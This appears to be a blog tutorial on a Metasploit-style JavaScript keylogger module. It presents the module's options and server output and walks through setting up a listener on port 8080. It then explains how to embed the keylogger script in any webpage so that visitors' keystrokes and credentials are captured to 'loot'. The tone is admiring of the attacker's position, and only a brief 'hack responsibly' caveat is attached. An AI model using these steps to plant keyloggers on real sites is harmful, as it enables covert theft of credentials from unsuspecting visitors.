Rarely does a week go by without a friend or family member getting their login credentials compromised, then reused for malicious purposes. My wife is always on the lookout on Facebook, warning relatives and friends to change their passwords. Many people don’t understand how their credentials get compromised. Password reuse on several websites is usually the culprit. Password reuse is a problem even if the website encrypts the passwords in their databases. An attacker only needs to insert some evil code, and allow it to do the work for them.
This is one of the many reasons how the Internet is a like a field of mines, where malicious code is around every turn. If an attacker can insert code on a website they don’t need to crack any passwords. Keyloggers can be included on most websites with one line of code. The activity that ensues is pretty awesome from an attacker’s perspective, they can sit back and watch credentials magically appear. It reminds me of the fisherman tales of fishes jumping into their boats.
Step 1: Module setup:
- demo => true
- Name Current Setting Required Description
- —- ————— ——– ———–
- DEMO true yes Creates HTML for demo purposes
- SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
- SRVPORT 8080 yes The local port to listen on.
- SSL false no Negotiate SSL for incoming connections
- SSLCert no Path to a custom SSL certificate (default is randomly generated)
- SSLVersion SSL3 no Specify the version of SSL that should be used (accepted: SSL2, SSL3, TLS1)
- URIPATH no The URI to use for this exploit (default is random)
- [*] Using URL: http://0.0.0.0:8080/qZBRzd
- [*] Local IP: http://192.168.1.131:8080/qZBRzd
- [*] Server started.
Step 2: Demo page URL
Step 3 (Optional) : To embed the keylogger into any webpage, use a reachable URL along with HTML <script> tag appended with “/[whatever].js”.
Screen Capture 1: Module setup and run
Screen Capture 2: Demo page
Screen Capture 3: Keystrokes captured and stored to loot
As always hack responsibly. Let me know if you have any question in the comments.